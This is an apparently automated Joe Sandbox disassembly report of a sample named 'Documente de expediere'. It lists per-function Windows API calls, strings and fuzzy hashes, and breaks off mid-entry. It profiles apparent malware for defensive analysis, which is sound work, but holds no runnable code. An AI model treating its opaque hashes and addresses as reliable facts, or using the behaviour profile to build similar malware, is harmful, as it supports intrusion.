                                                • API String ID: 4194297153-14809454
                                                • Opcode ID: 1dcba59df83dd1ded05d4ab1d78db2fc69fbcc498198df384a8ad3a604ee95ef
                                                • Instruction ID: c069e1003da32aded34d96e729d404af95c0fe2a89590622de172fbdfe9376e2
                                                • Opcode Fuzzy Hash: 1dcba59df83dd1ded05d4ab1d78db2fc69fbcc498198df384a8ad3a604ee95ef
                                                • Instruction Fuzzy Hash: A6319275A4020DAFDB00FF68C885AFEBBBAEF84740F148029E616D7291DB759942C751
                                                APIs
                                                  • Part of subcall function 00697F41: _memmove.LIBCMT ref: 00697F82
                                                  • Part of subcall function 006EB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 006EB0E7
                                                • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 006E94F6
                                                • GetDlgCtrlID.USER32 ref: 006E9501
                                                • GetParent.USER32 ref: 006E951D
                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 006E9520
                                                • GetDlgCtrlID.USER32(?), ref: 006E9529
                                                • GetParent.USER32(?), ref: 006E9545
                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 006E9548
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 1536045017-1403004172
                                                • Opcode ID: c057b42b68efba2a648565f1d64239ce50cbe81b7cee01407e6a611a42437764
                                                • Instruction ID: ecc2175719b152feef2b38dd003ce7c10d836ec2b5dad4c48527e8823c2a1825
                                                • Opcode Fuzzy Hash: c057b42b68efba2a648565f1d64239ce50cbe81b7cee01407e6a611a42437764
                                                • Instruction Fuzzy Hash: B321F470901304BBCF01AB65CC85DFEBB7AEF45310F108119F922972E1DB795919DB24
                                                APIs
                                                  • Part of subcall function 00697F41: _memmove.LIBCMT ref: 00697F82
                                                  • Part of subcall function 006EB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 006EB0E7
                                                • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 006E95DF
                                                • GetDlgCtrlID.USER32 ref: 006E95EA
                                                • GetParent.USER32 ref: 006E9606
                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 006E9609
                                                • GetDlgCtrlID.USER32(?), ref: 006E9612
                                                • GetParent.USER32(?), ref: 006E962E
                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 006E9631
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 1536045017-1403004172
                                                • Opcode ID: cd2fe146cfcc3b7fe77138798f8ef8a628185da8f079124a6d1caba3a3867091
                                                • Instruction ID: 498894e64ac4e851df1d70b413a2d571350520c51ed1cff6d22426aea92af9a2
                                                • Opcode Fuzzy Hash: cd2fe146cfcc3b7fe77138798f8ef8a628185da8f079124a6d1caba3a3867091
                                                • Instruction Fuzzy Hash: D721B374901344BBDF01EB65CC85EFEBB7AEF48300F10805AF921972E1DB7999199B24
                                                APIs
                                                • GetParent.USER32 ref: 006E9651
                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 006E9666
                                                • _wcscmp.LIBCMT ref: 006E9678
                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 006E96F3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ClassMessageNameParentSend_wcscmp
                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                • API String ID: 1704125052-3381328864
                                                • Opcode ID: 746f38c45cf6dd5d4645fa70104bbc84b255a063823644c8377bea56b6b1e1e5
                                                • Instruction ID: ed9328d20297e38e2fd7ec1c93b41d400ba2203a05c5dd0c8e797e3017ab7375
                                                • Opcode Fuzzy Hash: 746f38c45cf6dd5d4645fa70104bbc84b255a063823644c8377bea56b6b1e1e5
                                                • Instruction Fuzzy Hash: 1B112CB6249357BAFB112626DC07DE7B79E8F04360F30402BFA00A51D1FF9559514A6C
                                                APIs
                                                • __swprintf.LIBCMT ref: 006F419D
                                                • __swprintf.LIBCMT ref: 006F41AA
                                                  • Part of subcall function 006B38D8: __woutput_l.LIBCMT ref: 006B3931
                                                • FindResourceW.KERNEL32(?,?,0000000E), ref: 006F41D4
                                                • LoadResource.KERNEL32(?,00000000), ref: 006F41E0
                                                • LockResource.KERNEL32(00000000), ref: 006F41ED
                                                • FindResourceW.KERNEL32(?,?,00000003), ref: 006F420D
                                                • LoadResource.KERNEL32(?,00000000), ref: 006F421F
                                                • SizeofResource.KERNEL32(?,00000000), ref: 006F422E
                                                • LockResource.KERNEL32(?), ref: 006F423A
                                                • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 006F429B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                • String ID:
                                                • API String ID: 1433390588-0
                                                • Opcode ID: f622cfab551e4742ffd5ee181e7d78275006e09220b889588bce65e5512b1247
                                                • Instruction ID: 8673a0d7a7d81c4a387a9fccbf71008a358d400253ac19e677bd72510bffdfff
                                                • Opcode Fuzzy Hash: f622cfab551e4742ffd5ee181e7d78275006e09220b889588bce65e5512b1247
                                                • Instruction Fuzzy Hash: 96317EB160521AABDB119F64EC44AFF7BAAFF08301F008535FA05D2650EB74DA61CBA4
                                                APIs
                                                • GetCurrentThreadId.KERNEL32 ref: 006F1700
                                                • GetForegroundWindow.USER32(00000000,?,?,?,?,?,006F0778,?,00000001), ref: 006F1714
                                                • GetWindowThreadProcessId.USER32(00000000), ref: 006F171B
                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006F0778,?,00000001), ref: 006F172A
                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 006F173C
                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006F0778,?,00000001), ref: 006F1755
                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006F0778,?,00000001), ref: 006F1767
                                                • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,006F0778,?,00000001), ref: 006F17AC
                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,006F0778,?,00000001), ref: 006F17C1
                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,006F0778,?,00000001), ref: 006F17CC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                • String ID:
                                                • API String ID: 2156557900-0
                                                • Opcode ID: 4bac9a40ceb4371e8c5f9de824b3dbd24aa74a389eef22ce4481c593f27caa47
                                                • Instruction ID: fe8d83015db0a08a0ffec26f687d6eaa32e84cb385a82adb399863cd0af2d3cd
                                                • Opcode Fuzzy Hash: 4bac9a40ceb4371e8c5f9de824b3dbd24aa74a389eef22ce4481c593f27caa47
                                                • Instruction Fuzzy Hash: 6B319F75600308EBDB15EF14EC84BF977BAAB16792F10C015FA099A3E0D7B89D41CB54
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Variant$ClearInit$_memset
                                                • String ID: ,,r$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                • API String ID: 2862541840-2506191893
                                                • Opcode ID: 7c37de09b02ec78ff4313b24dcd145ea5596c262c546c38adf990a88a16448c0
                                                • Instruction ID: 8e3e67663b39227ba2be49ba288c6c9ad985ee5e14e8515bb03da06ec83a84a1
                                                • Opcode Fuzzy Hash: 7c37de09b02ec78ff4313b24dcd145ea5596c262c546c38adf990a88a16448c0
                                                • Instruction Fuzzy Hash: 6F918C71A00219EBDF24DFA5CC44FAEB7B8EF45310F108259F615AB282D7789941CBA4
                                                APIs
                                                • EnumChildWindows.USER32(?,006EAA64), ref: 006EA9A2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ChildEnumWindows
                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                • API String ID: 3555792229-1603158881
                                                • Opcode ID: c494039843d7ea1383c3be7b43f1629f8ce447d0ef61a37b93f2f1cd4630398d
                                                • Instruction ID: 54681b0401b3f2d4c27ece616c5bb3cebd71563352d84f11314ed0124e6f3827
                                                • Opcode Fuzzy Hash: c494039843d7ea1383c3be7b43f1629f8ce447d0ef61a37b93f2f1cd4630398d
                                                • Instruction Fuzzy Hash: 5891C770601346ABDF48DFA1C481BEAFB76BF04300F51812DD58AA7242DF30799ACB95
                                                APIs
                                                • SetWindowLongW.USER32(?,000000EB), ref: 00692EAE
                                                  • Part of subcall function 00691DB3: GetClientRect.USER32(?,?), ref: 00691DDC
                                                  • Part of subcall function 00691DB3: GetWindowRect.USER32(?,?), ref: 00691E1D
                                                  • Part of subcall function 00691DB3: ScreenToClient.USER32(?,?), ref: 00691E45
                                                • GetDC.USER32 ref: 006CCF82
                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 006CCF95
                                                • SelectObject.GDI32(00000000,00000000), ref: 006CCFA3
                                                • SelectObject.GDI32(00000000,00000000), ref: 006CCFB8
                                                • ReleaseDC.USER32(?,00000000), ref: 006CCFC0
                                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 006CD04B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                • String ID: U
                                                • API String ID: 4009187628-3372436214
                                                • Opcode ID: 989a1713afc2602fbb17c8c573c774dd64b255d1941428db0ebc1d9893f3fcee
                                                • Instruction ID: 108d4668f243b762d85bdb9d92fb0a533dd187a2b8fa8262759df0c120bcfe77
                                                • Opcode Fuzzy Hash: 989a1713afc2602fbb17c8c573c774dd64b255d1941428db0ebc1d9893f3fcee
                                                • Instruction Fuzzy Hash: A6719D30500205EFCF218F68C895EFA7BBBFF49364F14826EED555A2A6D7318842DB60
                                                APIs
                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0071F910), ref: 0070903D
                                                • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0071F910), ref: 00709071
                                                • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 007091EB
                                                • SysFreeString.OLEAUT32(?), ref: 00709215
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                • String ID:
                                                • API String ID: 560350794-0
                                                • Opcode ID: 80927e7df350a64bb7fd71a534390146c2835fd0a8b6a1e60a5a13c307c0c9a2
                                                • Instruction ID: 03b75446a028d98d5ed5df7ca7472a24c4d7fc5da4945f182b97c10a19ccb02b
                                                • Opcode Fuzzy Hash: 80927e7df350a64bb7fd71a534390146c2835fd0a8b6a1e60a5a13c307c0c9a2
                                                • Instruction Fuzzy Hash: D1F10971A00209EFDF04DF94C888EAEB7B9FF49314F108559FA15AB291DB35AE45CB50
                                                APIs
                                                • _memset.LIBCMT ref: 0070F9C9
                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0070FB5C
                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0070FB80
                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0070FBC0
                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0070FBE2
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0070FD5E
                                                • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0070FD90
                                                • CloseHandle.KERNEL32(?), ref: 0070FDBF
                                                • CloseHandle.KERNEL32(?), ref: 0070FE36
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                • String ID:
                                                • API String ID: 4090791747-0
                                                • Opcode ID: cabb3c3e825616bfcae62a055278e751aba17730ccff4fb0799750a8cfe7f394
                                                • Instruction ID: 70bad4b3686520ce1d6df72169c8c24ea7f2dab72a17176a3e0747fd64bdbe3d
                                                • Opcode Fuzzy Hash: cabb3c3e825616bfcae62a055278e751aba17730ccff4fb0799750a8cfe7f394
                                                • Instruction Fuzzy Hash: F7E1D271204301DFCB64EF24C891A6ABBE6BF85314F14856DF8998B6E2CB35EC41CB56
                                                APIs
                                                  • Part of subcall function 006F48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,006F38D3,?), ref: 006F48C7
                                                  • Part of subcall function 006F48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,006F38D3,?), ref: 006F48E0
                                                  • Part of subcall function 006F4CD3: GetFileAttributesW.KERNEL32(?,006F3947), ref: 006F4CD4
                                                • lstrcmpiW.KERNEL32(?,?), ref: 006F4FE2
                                                • _wcscmp.LIBCMT ref: 006F4FFC
                                                • MoveFileW.KERNEL32(?,?), ref: 006F5017
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                • String ID:
                                                • API String ID: 793581249-0
                                                • Opcode ID: 1ddfeac077567fcf691254b0cfc02b2da19fb9ec2c0e4aa4e69da9051df3443a
                                                • Instruction ID: c49d7263566db8703dc9698bc3c5e2dce37c62b6fdb753f02e2925bc3afb1333
                                                • Opcode Fuzzy Hash: 1ddfeac077567fcf691254b0cfc02b2da19fb9ec2c0e4aa4e69da9051df3443a
                                                • Instruction Fuzzy Hash: E15177B20087855BC764DB54CC859EFB3EDAF85340F00492EF299D3191EF74E589876A
                                                APIs
                                                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0071896E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: InvalidateRect
                                                • String ID:
                                                • API String ID: 634782764-0
                                                • Opcode ID: ad078a5cbe2ea77d4e065e39b4a9e934e898bcd172bec22ef832cd70e17c4895
                                                • Instruction ID: 0960b8d89b892f5f3a97100f836ae0c31adb6348fd0fd57041732fadbc180fd3
                                                • Opcode Fuzzy Hash: ad078a5cbe2ea77d4e065e39b4a9e934e898bcd172bec22ef832cd70e17c4895
                                                • Instruction Fuzzy Hash: FD518230500204BBDFA09F2CCC89BE97B65AF05354F608116F515E66E1DF79EAC0DB86
                                                APIs
                                                • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 006CC547
                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 006CC569
                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 006CC581
                                                • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 006CC59F
                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 006CC5C0
                                                • DestroyIcon.USER32(00000000), ref: 006CC5CF
                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 006CC5EC
                                                • DestroyIcon.USER32(?), ref: 006CC5FB
                                                  • Part of subcall function 0071A71E: DeleteObject.GDI32(00000000), ref: 0071A757
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                • String ID:
                                                • API String ID: 2819616528-0
                                                • Opcode ID: f139bcff02c370cb32fa22645b6b07c4a5b5d3f22aa18bf0d964ccb9bd443859
                                                • Instruction ID: 15a66c40c2fc8e9385f7c005718d608b6b9d6c4e01444062f36a83ad77a97c48
                                                • Opcode Fuzzy Hash: f139bcff02c370cb32fa22645b6b07c4a5b5d3f22aa18bf0d964ccb9bd443859
                                                • Instruction Fuzzy Hash: CC51577460020AAFDF20DF28CC55FAA37EAEB58324F508528F906976A0DB74E991DB54
                                                APIs
                                                  • Part of subcall function 006EAE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 006EAE77
                                                  • Part of subcall function 006EAE57: GetCurrentThreadId.KERNEL32 ref: 006EAE7E
                                                  • Part of subcall function 006EAE57: AttachThreadInput.USER32(00000000,?,006E9B65,?,00000001), ref: 006EAE85
                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 006E9B70
                                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 006E9B8D
                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 006E9B90
                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 006E9B99
                                                • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 006E9BB7
                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 006E9BBA
                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 006E9BC3
                                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 006E9BDA
                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 006E9BDD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                • String ID:
                                                • API String ID: 2014098862-0
                                                • Opcode ID: 8d6f19470673af8337659a9846c39c76162fd90fac26a5ca9102cd15f0e1ccf1
                                                • Instruction ID: 1a73a2d8f61c00057cf4926d43ac8d763a2a3d154abefdac08cd551da6bd6ccf
                                                • Opcode Fuzzy Hash: 8d6f19470673af8337659a9846c39c76162fd90fac26a5ca9102cd15f0e1ccf1
                                                • Instruction Fuzzy Hash: 6D11E571550618BEF6106B65DC49FAA3B1DEF4C751F108429F254AB0E0C9F26C10EAA8
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,006E8A84,00000B00,?,?), ref: 006E8E0C
                                                • HeapAlloc.KERNEL32(00000000,?,006E8A84,00000B00,?,?), ref: 006E8E13
                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,006E8A84,00000B00,?,?), ref: 006E8E28
                                                • GetCurrentProcess.KERNEL32(?,00000000,?,006E8A84,00000B00,?,?), ref: 006E8E30
                                                • DuplicateHandle.KERNEL32(00000000,?,006E8A84,00000B00,?,?), ref: 006E8E33
                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,006E8A84,00000B00,?,?), ref: 006E8E43
                                                • GetCurrentProcess.KERNEL32(006E8A84,00000000,?,006E8A84,00000B00,?,?), ref: 006E8E4B
                                                • DuplicateHandle.KERNEL32(00000000,?,006E8A84,00000B00,?,?), ref: 006E8E4E
                                                • CreateThread.KERNEL32(00000000,00000000,006E8E74,00000000,00000000,00000000), ref: 006E8E68
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                • String ID:
                                                • API String ID: 1957940570-0
                                                • Opcode ID: 56f5ce3d648e29cb66186a16302adae4ff5f033c966216973c4f1fde37b3459b
